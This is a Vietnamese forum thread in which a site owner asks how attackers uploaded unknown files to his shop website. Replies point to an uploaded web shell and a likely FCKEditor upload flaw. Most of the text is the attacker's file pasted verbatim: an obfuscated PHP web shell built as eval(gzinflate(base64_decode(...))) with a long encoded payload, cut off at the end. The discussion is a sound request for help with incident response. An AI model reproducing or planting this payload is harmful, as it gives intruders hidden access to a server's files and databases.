| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
27/06/2011 16:25:20 (+0700) | #1 | 242205 |
nokida
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 27/10/2007 02:55:11
Messages: 4
Offline
|
|
Hi mọi người,
Hiện nay, em có đang xây dựng một website cho một cửa hàng, nhưng trong thời gian này đây, kiểm tra thấy trên server xuất hiện một số file lạ, khi chạy các file này thì sẽ hiển thị ra trình browser file và database.
Do kinh nghiệm về security thấp quá, nên em chưa có định hướng được cách giải quyết, mọi người có thể tư vấn giúp em là cần thực hiện các bươc như thế nào để tìm nguyên nhân bị đưa file lên không ạ? lí do từ source code hay là từ host?
Em xin cảm ơn |
|
|
 |
|
| [Question] Xin tư vấn về Website bị hack và cách phòng trống? |
28/06/2011 10:24:00 (+0700) | #2 | 242263 |
![[Avatar]](/hvaonline/images/avatar/3a4b1e3bf66c54303dbf907e5fff4362.jpg "[Avatar]")
|
louisnguyen27
Member
|
|
0 |
|
|
Joined: 12/08/2008 18:04:41
Messages: 321
Offline
|
|
nokida wrote:
Hi mọi người,
Hiện nay, em có đang xây dựng một website cho một cửa hàng, nhưng trong thời gian này đây, kiểm tra thấy trên server xuất hiện một số file lạ, khi chạy các file này thì sẽ hiển thị ra trình browser file và database.
Do kinh nghiệm về security thấp quá, nên em chưa có định hướng được cách giải quyết, mọi người có thể tư vấn giúp em là cần thực hiện các bươc như thế nào để tìm nguyên nhân bị đưa file lên không ạ? lí do từ source code hay là từ host?
Em xin cảm ơn
Tốt nhất bạn nên nhờ ai đó kiểm tra hộ: quanta hay anh conmale gì đó. Còn mô tả kiểu như thế này rất khó phán đoán bạn ạ. |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng trống? |
28/06/2011 13:08:47 (+0700) | #3 | 242275 |
![[Avatar]](/hvaonline/images/avatar/7f11b15655b2342b01a2db7edb7961cd.jpeg "[Avatar]")
|
gamma95
Researcher
|
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
|
|
| nên phòng mái chứ đừng phòng trống |
|
Cánh chym không mỏi
lol |
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
28/06/2011 21:33:08 (+0700) | #4 | 242323 |
nokida
Member
|
|
0 |
|
|
Joined: 27/10/2007 02:55:11
Messages: 4
Offline
|
|
| Vâng, cảm ơn 2 bác. Để em hỏi anh Conmale xem có được không ạ. |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
29/06/2011 00:32:53 (+0700) | #5 | 242329 |
![[Avatar]](/hvaonline/images/avatar/cb5148f1c50f4f2989e4a5dda630dfde.jpg "[Avatar]")
|
thuypv
Member
|
|
0 |
|
|
Joined: 11/06/2008 12:25:57
Messages: 64
Offline
|
|
Bạn có thể chụp ảnh 2 cái file đó hiện ra được gì ko, chụp ảnh rồi post lên diễn đàn
Mình nghi bạn bị dính 1 con shell, kiểm tra lại phần upload ảnh, xem có hạn chế file ko, hay là cho upload tẹt ga các file như, php, aspx, asp, ... kiểm tra xem chế độ ghi file ở các thư mục đó thế nào
Lưu ý, chỉ cho quyền ghi file vào thư mục ảnh và tài liệu thôi, còn các thư mục ko thì không cho ghi
Bạn kiểm tra và chụp ảnh đưa lên đây để anh em phân tích tiếp nha |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
29/06/2011 13:22:59 (+0700) | #6 | 242356 |
canhcoi.itqn
Member
|
|
0 |
|
|
Joined: 28/06/2011 21:34:35
Messages: 1
Offline
|
|
tại sao không giở được bài mới vậy ta. định hỏi các pro về trang web em bị hack 2 lần.
Website của bạn đã được chèn đoạn mã liên kết lấy ảnh tại : http://cC2.upanh.com/24.308.31412951.0eY0/overlord.gif , bạn vui lòng kiểm tra lại source code của bạn. Nếu có thể bạn upload lại source code cũ của bạn và đổi lại các thông tin mật khẩu, tài khoản... của bạn để đảm bảo an toàn.
TRang web của em là: http://phimvn1.us
chắc đây là mấy anh em việt nam đây.
tại sao ko hack trung quốc mà hack trang của em chi mà ác vậy.  |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
29/06/2011 19:44:22 (+0700) | #7 | 242389 |
nokida
Member
|
|
0 |
|
|
Joined: 27/10/2007 02:55:11
Messages: 4
Offline
|
|
Vâng, đứng là bị upload shell lên bạn ạ. Có vẻ do trang web của mình dùng FCKEditor, và ai đó đã lợi dụng lỗi của cái này, để upload lên. Do đã xoá các file ấy trên server, nên không chụp lại được hình.
Nhưng có điều là, mình đang băn khoan là, khi uplod file lên, thì mình cũng đã set config kiểm tra đuôi file trong FCKEditor, nên không thể upload file .php. Mình cũng chỉ thấy ở thư mục lưu file, chỉ có các file không có phần mở rộng. Mình thử chạy file này, thì thấy là web server không xử lí, nó mà chỉ hiển thị ra nội dung text trong file. Nên vẫn chưa rõ, cơ chế mà họ đã lợi dụng.
Còn đây là nội dung text của file mà họ đã upload lên:
Code:
<?php eval(gzinflate(base64_decode('
7X1pd9tIrujnzDnzHxi1XmRNFC12nG4vcrw7TmzH
8Zo48VVTJCUxpkQ1SVlWevJ++wNQO0UtTrrn3HvP
S88kYq0oAIWqAlCo1xvrr/ud/j//8Uvli/jPso4H
wY5/3vGCwLqvlhctlYf//QKlrcu+aydebLWisGvd
e1Hshz2rVq5SZq1o7fsPnmsdj84/HFl+L/aixGoN
ek4CxbDEoiiRRLYf+L225fpRjDlLIqflB94Lz/UT
zB12vJ4Ve4mVhNavv/6KBV8WrTOvG95D0S60IZu3
Foad0Op5nhtbfvK6iGWXseyLYRQmnvXM8rv9iOr5
vcSLWrbjYZlXRWvLdSHVpmZi7MrrJX7kIWyek4SR
7xGIv4qSTthr+e3nrTAadAHenutFmP+byGfDdwfd
vjH4FZG/u/08sZuBZzmRZ2NuCZIsNwr7JYtluF7g
JV7JsnvYWzDo9kSNcNBLCNfVIieGCwhyBpGfjF74
vVZotaDNAUAP4/B7TjBwPasbwvcg9lqDAJpOAG00
oBoQrHGAMASjhnUo0IMUsJpROIyRBAhCB/5CalGl
RTGMpt3rsZHXltTQXpzaEdCd6gWhYwP+qMhLUcTr
DbpeROM20FNbVvjtdrVM4LYwspqjvh0TRGK4VuTF
SeSzMtSCpGUTiBITIz8DMJ07oFgPSGktMP4ADkb2
Ih6pAVnl0LFnBNx7gD4YV9lBEheNiTLjP5gKm37P
bwDbLuS6wKrRqBH4XT/JlXKLy6+Oc8U1KAG5ja7d
9p3GHwNgz7gRAWH9rrdQxezYi3FmNeLEjpIFTAmb
2keefta7vgOsjZUw0W8t+DF2mm8c7F18LiQdr+sV
botFK9843zs/P3x/IhPrZhmoXalcAJXvYusOuLqf
WGsw5jyizg3DqOHUc7sfwq/29fLX5puru5vzrd8+
fTxJjhaD+09LZ7EzWg5P29V3h4vB4NPiQ+3m4LJ9
+uZk2RmtVO3rWnDUbT9P13eWgm9HSydB8+Dqq7uT
Wb96c/DQ/+Rn5V0N7I+Qn1Xv4GrkdJfvs/s8G8F3
Lyuv2b2C/g4H9u7Lkx3/pN/snsTu9VlwuPvwzft4
fO++CYY3H4+z8gc3H8/6WB/wMZgy1vtPi0kweaww
VTPztqv2m7fBp+sPrG/Id7sr/ZudrT8+LD70b66X
q+cH+wPAVeD4ncXmYnB3uNP/2jwIgmbvQ3/3Q/9X
gOctwFM9PLi5O9yttt9RX4EoQ/k3b66Gx36ne7Mz
bB/v3I2nnWek+Xe87U/hTXdlZI/afWh/5XB3q4/p
O9dXL2+uT+J3O4f3n7qAm8W3HWex7R/tbPlO9+pb
83plcOir/mDM987iJbT1of9+WH238/Ft4L65GjX9
rSF+tz5U38F4+gBzu3m932/6Hfr96ePb3qfRsP1p
sdNx/K0/8NsNEvcdlPewnWsc73biLK58tbEc0SKO
Dw/u2qfnWw+sL4HnsxaUFTgnuJBv3OuT6uEbomHn
5uBsBL/pX1b3pOr0kI+3vzUXTyJo484JVgC+7W/0
+y4YYLnDna32IeF+e9hcels9vd6vNhfvQgZv/PDx
XOHz3UGN2kJ6EdyLV9V3e/sHH6vB+7OrD/Hh/snp
h2rSuqydnZ9d7p8c7Wy/vdzfPr+onZ1+rJ3tXu7c
MVrsVB8QDzsfghHwac3pvmwfXexhP8BLgYTvqAc8
Hax0P13X+s03d293LqrtD5c3rfPL5f2r3TirLI0f
frcovX23crgXvP9webZ3GaxsXwRsLM7i/t3Nm7dv
m/7yN+DBlnOwMnK37t6enm+H7sHKwBl1CBfvLqAP
H/CzhfSqBc3rk6F33u6y+ofx4c6N6h/wbH/sB83F
T2EWbT7C/Hl3Lvq/qjL8rQzdnY7kgcvqyvHHGuFw
/2qHvluXd1dXl9Wr7bO9s3Pg0VDw07vzm77ep31+
R/zJYA267w7ewvz/EDY/cr4SsAJvO4vBq5vrle47
zi8AV/sQcHu8E/zK5shJ3AQ5KOhNeGjfvYX5UXU/
vh0g/RiPVRE/SIf+jd+JSf5dv1R97u4N351vrQA/
J8fnP9z2kn0QxDfn7Yd3H1lZxosnkhc/XZ98vYG5
ItoEvLy/unw4Fv+K8QGP9WnufYD+3pyF0GfnZn/l
K/7rHlyGb3s8jeTNsG1LGTZsv3tzc29ff2i/84Ov
jF6MlgRnO1jB30RbMY5d5Of+Sm6NL1p8vW/0vSio
5w5He/fux5MRiB+Ykisgxt/GULwGoqZ9yacWoqH5
8a79buesz0l3R6y6M7z7tFi7e3dR2/pw9fbN1VdA
S7e2fLhzNqRyX2upKd8W9drA7oG7v9JBNlftMtbB
vt6+2R41l87uEa03yKZv3t5DWd+7Xu40ry/Dw97Z
V2fnkMpLEbCvsewen56MfXfPaysXV/tv9z9cVmOE
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
bCy1Ps71eUeDplAU1Xit74LyhtSFgetC12HzxSyE
WqFBvxHDVnKBzyd9h3YKh6nPheYA89FmIrZTfCPu
eGgy3LjooHjBzSWjWhhYQx/QYScJbgUQH5EHuyrv
HqTDvReNmNgkYylMfZjknuO3EHNI7gV2EsCmHOBA
SoyLTGodtiwu5FqDoGSNwgHrqelZfWitj6sgCjrb
Qoj56Cw3HPaC0HZZG+v+xkmIG7/3vQCNZbZLJkQE
KZatiSqeW7YOu7Dlii1lAMPyWlE44cCJB0tedPyY
jT/uhAMAPcQummRkRPuqFQPG7MgPabWA+eV0aAwd
+54Mk38MfOeOgOLYYuMoxBZb8WAA/sZ6haM9p04U
kp5+r4UKvhlbqjE2EXOzlO95Q/yS5X6Z+Udri58q
8/AXsKvaGPJ9n2IwI1PkwjIEA6/jVjnpRANqBmYb
pA2inoV5tPzksaY8QXL9A3QMJ0f+j2gBfsajGHgQ
01DM4b9R6DToN00iAxDY+iLmAjw85ywonDNGwSuA
3GEQeA/9AFZW2GBnlJOHLipLhy3UKhS1s9ZTv9dg
o6Cskmqay0e1Z8F8wBONzxC/hDE6zXN0aclfQ7+3
kPsCo8ZPkaWjU1swcFXUeuJ4y+iL5Ri9zdekpEpG
oymaPwpSxQBZ0MrcH4GY8UkGuJixkMMWc6VCJOVx
en+KaE8thmxR3Xza8sKWUQCbBhFV32zBGhUv6CR7
stmnzZaZqMZg832MWA54zovaxLHp08AYHoyo7/c9
PrtYYrW+wXV/mFWgAZdYVi2dNSzw4WicyLABWBN9
cgHB+yrl8e9Yw+FmCons13RMUhufa7c6OhOFTZkt
UdriKB3PITglwnnn41hPZiP9Oz/i63l4lsZjnZRg
e9zxw8vVN3KkKH1tO0kd/UFAsuzjsmTm0EoFWbth
1/Z7qUyXJ5Zy5G5jZsZ/BJCx13NAbEXp7jAxB3TN
nXsOLHq9VpiqTLJ1J4I1NV252aKK2+SL4kUpkJiL
CtS9gJUxlZdQEozFhlUVdmPp0TQxc5v7W1hvwjhJ
td3h+dYOs22lstHoBSXYnpLt0lKjohwo8g6X84wC
d5DO1gq+6cHDxMY6qoM21hM/CbwN3UFssVxdr7Dk
9QoVomVaaPnGXE7kgkBqoEI78rxeYVXbY8XJCNoi
nmqG7uhPJwzCaPWXV6/296vVNdjt9JIXsf8N9jO1
xf4DT2jZXT8YrVpADL+1RvugdhQOeu4LVt1qwiLH
1XZPEtf6sxnCDgbSa/0H2GsEvmv9Uq2yHsYqQ06t
hTl9PBT02quW6liHhHf1y9ISNSQ6W+2EsAf8cxJM
2dX8Xn+QzK4jYR4bDiFWb2wiGNDIq1cKXu8hQUXg
z/QNkioRJ3nb+hObfOF6Tsi8vVatHmx/VDsGZYee
3+4k0FcYuKIFBrn1Z6pjlgt8C7NgbmhZpV9QZnAe
eNEMkyTsGqzASaEIvoz0pXHYgd+GIbAtqd6cZf/J
i7+I2Bhqy4oroP+dndn8C3tlO+A9jWPM6I3TM02N
saoD9EsEASwI8kvTjv4c+m7SAQiq1f8Dowxh001l
W+h6OXn6WAJVqXFUcRyB10ooh6M1CfsGTvfpz5rV
4RRmozcwzABcr2giYB1lAD8IM9W7kh2uHd0x0TFd
dqi+f1B4AHLxz3TxIfqYXH1e+cFbepQg4HWyZmNG
e9NkQbW6sjJbFsgxpVH8s9LAINU0aTCpwESBMAnk
uUQCG8RfKRDm48nHC4RJePkfM++zp7zrtexBkMwz
3Tmt5kJs7ERhEABqXuBujA+7GaClT2XBxjUc8ryR
h3ofPRc9yI2KM3YZNMEmiYmlpXnFBB/lY6QErzIB
qlev5hcRUHbGTBf7HrlsC8SpFlO7shnCBjEzaxyP
EjU6m8yx7WDwP2rToYMza8uBOMVp8tdJmEfNgx/a
ceA26X/njsNqtgmOeoHgKAhVvJRH38X5CMXGq5cN
HD+qxk4PToJm7yxwvj70m9dO21l6+/X03A3dN2fD
9/5v9/Z1rXdycbh81A2ST9du4Cx2Op8W44H78Vjl
fdt7OPn66f6f/2heB/GnxeCbfXAVNw8eohN/edjs
Or3Tr8P7T4tXA/fganTartfpvMaFIrsgQgOqFzjW
/V4H9jbJmtW1o7YPaLcHSZjJXQVAwnoSwUnP3Tj3
IpwAh6dwwHMp5VM4ML53/fjOIucbmXQuXIley6T3
6Ca0DXja9SOVek56NfXJOkMXpiGIAb0LHJCrrGUy
63BX1abDKN0zgSIsuQLDUIMhVypZntw+1BcNwQpb
FvMx0jLEaFSS7vSkUsm7SasHw1Bf3BtAJZDzgfzM
lX/IXFPOGeOsEOE3SOUPn65/b/luvYBTl7Gv1NCS
NoY0tOgCscGdYjj72FYn8lr1AqUWNj5TIet2vWJT
I7xUBZqHhZrp5LUbJ8x+4vWcaNRHSjAbCp738149
lU3+aGIpR98jfvUK+iZlRMHqot8bjAHERVLYENaX
dbFSWHg3qV6orRRQ4sGvX5cLZN9AK8TG8e7yqpUr
d93lhbwHyPrSO3+zVcOkuGPXRNoOQoKJBJJMPdtZ
WmSpztKiSN2mqW4xdZKL2XzyM11SqhiTCHoxLiN4
scuzI4tVxCKDKDBbwWxWgWebtbf93uIb7wEbh18d
70Fk7HoOZmAlF/29eAawB8cakQ3/f0jLvLVOyz1z
LitgoUJKeCxVQdoWLPLkk7RDWUkN6bXjQbPrQ32y
0NcLe7ysWRW5wrTpfM9gITeEqYCKP8ZBwn1vCKkW
LzPkJW5Nj76Mpi77aNrSeJGM4Tx70BBigzFknqDN
N/YPj/bOMZtB8bmA6ayIVG6NlfFgpxillVzVVW4A
2cT7io1BnxnaqFJWI0m332CdlZT3AyYwXS/3N0CL
omhKMxIGo3VpOc50T2B1yPz3VLOojaGta0N7qHnV
8IYWNXK2fSLMbOxLIoRVxWpsLo/p+w7JXleA7cNJ
mHToGh8aQ0HEwArllayvgzix7nznDg2lXYt03vhz
VIiYkRKbkpJM6w/AJJGGvzUHmDwwNNq5IqcTLVBm
qVAW9gs0D0A+GvH7nX4u7RSzmW916i2mwGc1ba2m
qbRvdUw3Ac03hSVsttB4TyVLObp1a216MFEWvvA7
eMjp1usN4VWnFPatDk/i/ibCd0V6pjAKn2sswM2i
6CLF4WDmXthEST5gRVhrLJeWjj008vkJNw8DRqGB
zip9IpJee3UEnXTnmUoZ5pvF1DKPoJPmkkI5RelE
RphPe49JC0/KNUO4kMkFlbeWMqVoU4gKcL8wd113
uhgjITd8yG7TzaW9zFqyfbNdjX6aK4NBzAvchnAa
cNhWJS11KgqHNo2Ksq80aXbQt+kvoIzm3pVBnJJo
04FS94VbbcYwj64UbcbKG/NokmNXGqtpYn3P5JBx
by9sd1qzOq2mEYm5xMHf5NeRTSvuWzaVVN8nLYcO
2qGUKH6SB1lVF27WMPxOOGSy+Ans7+KkvskFl1he
0BkXM1ILjDTmpk25WLaYZgMdpFbS12BK43g7GpCH
KC8NhcmH+XZTS8A7DbfKP09O4qfcn1Z11OiHUcLu
MOOv+njWmpqbvExhaan6qqBaHW8Ur0yHg4QcsJ/2
I6/d6Nq4jOUq//W5+mLlNl/JlbLLc3GSx5T6ktE3
JWXWEnI9D6l1zOG30wyYECe47uMQStSYZid+ilUB
B0h66e0uvDzDXkrIEU8ojytmPubWY0Vd3XdsM08X
ZbgJmcroHmgIXxDC+XEB4TBQg7QFsJPI7y5QI8Us
1zTGGqfcNRxmHJz3n1radzTGL5YPEgkbNEQoro6I
QL5AAlJUjpJ6hpsZuQLgJKnXUJtU5I6tF9EI2RR7
YP1obqxiUn1POZ9lu31yaj7Vufm7pbsimPMn8rph
4jGEpudQpYLUFifehvcApIgXcl/9pN35OoK0r50w
B7PB9b2FnINHhXjQR5axOjZFrmgCfD06N5flhqLy
L+Hz0Kk7cKBo+D0/G5wGHBSAB6TsfkLFAfgQj0hO
p7QDXb4/vWi82dva3TsrVWeVwy5KtXlK7R/uHe2e
lwoFozD3ZxEboSf/qkjGN+dtJ0n6qxh94bk2d7OH
xrG3G1q9MJEhMqiBSgXd1dBTj5W2AECFxzxezpHO
ULA5L82Fwzx6ttWp8ueqEAbA8gt5v15by/vrFNNj
gQoU4fv5c5jpuJujy0DlOp0CqHbeF9XH3V1MHrtv
ZoroMWl43wS+6eAG9P2Zlc6K7UDD1yms3rFwYRxZ
NnJch3wFsZxE0kRpM0E6MclD8kMXP3Je5++bcH6s
42meTvQkY8pjQK4pF1xeo14fG2S2K26WGGJVboWk
krLIdM41JM53DQImb7jASfeqL9kKiinyKMsFVuyP
uGO5IXsms0V3FP8RZHJGHtefulGOL0mCi+mGpVmA
Cf+J6zcrJFdwi/oo13OrvIDKv809YrFKMdBMDmIH
cOpLLrwISYk7HLNV68cWLWxhEnfMuyBN6plzRDYz
jLPRE/MMq/X4feaShHe7stnCjqJMiYc1GiChNTEH
/WNKHesoQTcmcrSaXLLsoUIIBAqXuS0/AjYpK7mb
ISuhCykqNSmJPaOQtB6zSowDNH1pgKLzS7ux7TWy
IKGpFYfOHXcSZJgr/VYt5b0o6oX0T5xEpeXM7VR6
BsyeApLpNpaR5fAKDeMetpuh+nK7g8oTUknWTTUn
2+QZWCMBUCwXVmmJimOtxzy7R1jPHexdMCJZ4kbh
l+hLLzdWEiQDur2tWgIfE4tt8auI3OzE7jVymCdW
4m5zVGMH949YMlW61R8g8gSNSrx2CUgRIKHYp47X
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
8WLtwCLRYFK4zlzTWZwv2Lap5QNHDnwBVU9CVgtk
BTp08yecForj+qVz8cwOXv67972h0isZV82Mq2XA
afzeFXCOdcVaN+6IWcatKnlFTL9UdUwU+EAUkIln
HKsWx6rMAMDPyP9KGOz1OiBfNTSoS2i0g5Jf6Emn
36l6Ii+PwdB/4FJYiq1URgbnaJfDJENQGoEByYq+
Wgd8kqgUzv2yJg6EKJ0TF8Toa2wvOOiyaTf0ey5q
htglD9K/jV9OW+PS0MNxLOSO/N7gIVfSgnxTdE7R
VI08Csh9lSdJYYkX76AHIw4Z0/bBuYdu7FX+b66k
aW0zKxg6wVIOjeGxVgWIWs9x5w2WUcmVZ4ZmF5Jc
Rity+UKOIhJ2a/KeHDRf2MgT59iGWDXrk5KcxKEU
f4II36UebdKFOqDyHwPYgWrGHWn44scHFqwNpWI9
7eXUJYcrmPTlfJcZsbpsA9SVvhrcg7inh2tL6aea
pGHgbbML0A23aeZzrS101yB4BSj0ka1P1IcmNM+s
Et2lWhCqYLvFbrSIJgGtDdRhLmjd6XTb4uVJ0QnH
LFF/3TSl4QWrWB694Jsc87UEfdUn5Rtpe4G9XTUx
MgLPr1lod9gUhgdUtUi9+qkXdX064sGy2PM9F9Xp
yAQsNK3WsNZlqkEtZ2a7KBQifO1A7pFxirgz7gyz
m9qZV4SFWNxh7cp7t6tWbo28tPogP/J94aXFuy9C
